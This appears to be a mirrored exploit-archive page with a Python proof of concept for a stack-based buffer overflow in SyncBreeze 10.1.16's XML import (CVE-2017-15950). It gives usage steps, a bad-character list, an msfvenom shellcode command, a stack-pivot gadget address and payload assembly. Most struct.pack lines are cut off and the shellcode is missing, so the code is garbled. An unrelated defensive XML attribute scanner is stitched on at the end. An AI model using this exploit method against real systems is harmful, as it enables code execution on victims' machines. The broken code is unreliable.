SyncBreeze 10.1.16 Buffer Overflow ≈ Packet Storm – Digitalmunition





Published on March 30th, 2021


# Exploit Title: SyncBreeze 10.1.16 - XML Parsing Stack-based Buffer Overflow
# Date: 03/27/2021
# Author: Filipe Oliveira - filipecenturiao[at]hotmail.com, Rafael Machado - nnszs[at]protonmail.com
# Vendor: https://www.syncbreeze.com/
# Software Link: https://www.4shared.com/file/57pE4sZfiq/syncbreeze_setup_v10116.html
# Version: SyncBreeze v10.1.16 x86
# Tested on: Windows 10 x64 (19042.867)
# CVE: CVE-2017-15950

Usage: The exploit generates a POC file called xplSyncBreeze.xml. Launch the application, click on Import Command, then load the POC file.

# -*- coding: utf-8 -*-

import struct

# badchars: \x00 \x0a \x0d \x20 \x27
# plus every byte from \x81 through \xff

# Shellcode payload size: 432 bytes
# msfvenom -a x86 --platform windows -p windows/exec CMD=calc -e x86/alpha_mixed BufferRegister=EAX -b '\x00\x0A\x0D\x20\x27' -v shellcode -f python

shellcode = b""  # msfvenom-generated bytes (see command above) not reproduced here

# padding to overflow the buffer
basura = struct.pack('

# gadgets to move the payload pointer into EAX (alpha_mixed decoder expects it there)
GAD1 = struct.pack('
GAD2 = struct.pack('

# padding to reach the buffer address stored in EBP
basura2 = struct.pack('

# padding for the stack pivot
padding = struct.pack('
padding2 = struct.pack('

# stack pivot to reach an area with more space for gadgets on the stack
# 0x6506491c: add esp, 0x48 ; pop edi ; pop esi ; ret
pivot = struct.pack('

# final payload

fruta = basura + pivot + padding + padding2 + GAD1 + GAD2 + basura2 + shellcode

# write payload to the XML file
payload = open("xplSyncBreeze.xml", "wb")
payload.write('<?xml version="1.0" encoding="UTF-8"?>\n\n'.encode('utf-8'))

payload.write("
payload.write(fruta)
payload.write("'>\n\n".encode('utf-8'))

payload.close()
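The POC above is a command file whose single attribute value is thousands of bytes long and mostly non-printable. A quick triage check for import files of that shape, added here as an example that is not part of the original advisory, scans raw attribute values without relying on an XML parser (the malformed file may not parse at all); the sample inputs, the 256-byte threshold and the `command` element name are constructed assumptions.

```python
import re

# Constructed samples, not files from the advisory: a plausible benign command
# file and one shaped like the POC (huge padded attribute with raw bytes, the
# pivot address 0x6506491c in little-endian, and alpha_mixed-looking text).
BENIGN = (b"<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\n"
          b"<command name='sync1' source='C:\\data'>\n")
SUSPECT = (b"<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\n<command name='"
           + b"A" * 2000 + b"\x1c\x49\x06\x65" + b"PYIIII" * 20 + b"'>\n\n")

# attr='value' or attr="value"; works on bytes so binary payloads are kept intact
ATTR_RE = re.compile(rb"([A-Za-z_:][\w:.-]*)\s*=\s*(?:'([^']*)'|\"([^\"]*)\")")

# bytes that are fine inside a text attribute besides printable ASCII
_WHITESPACE = (0x09, 0x0a, 0x0d)


def scan_attrs(data: bytes, max_len: int = 256):
    """Return (attribute_name, value_length, reason) for every attribute value
    that exceeds max_len bytes or contains bytes outside printable ASCII.
    max_len is an assumed triage threshold, not the real buffer size."""
    findings = []
    for m in ATTR_RE.finditer(data):
        name = m.group(1).decode("ascii", "replace")
        value = m.group(2) if m.group(2) is not None else m.group(3)
        reasons = []
        if len(value) > max_len:
            reasons.append("oversized")
        if any(b < 0x20 or b > 0x7e for b in value if b not in _WHITESPACE):
            reasons.append("non-printable bytes")
        if reasons:
            findings.append((name, len(value), ", ".join(reasons)))
    return findings


if __name__ == "__main__":
    for label, doc in (("benign", BENIGN), ("suspect", SUSPECT)):
        print(label, scan_attrs(doc))
```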
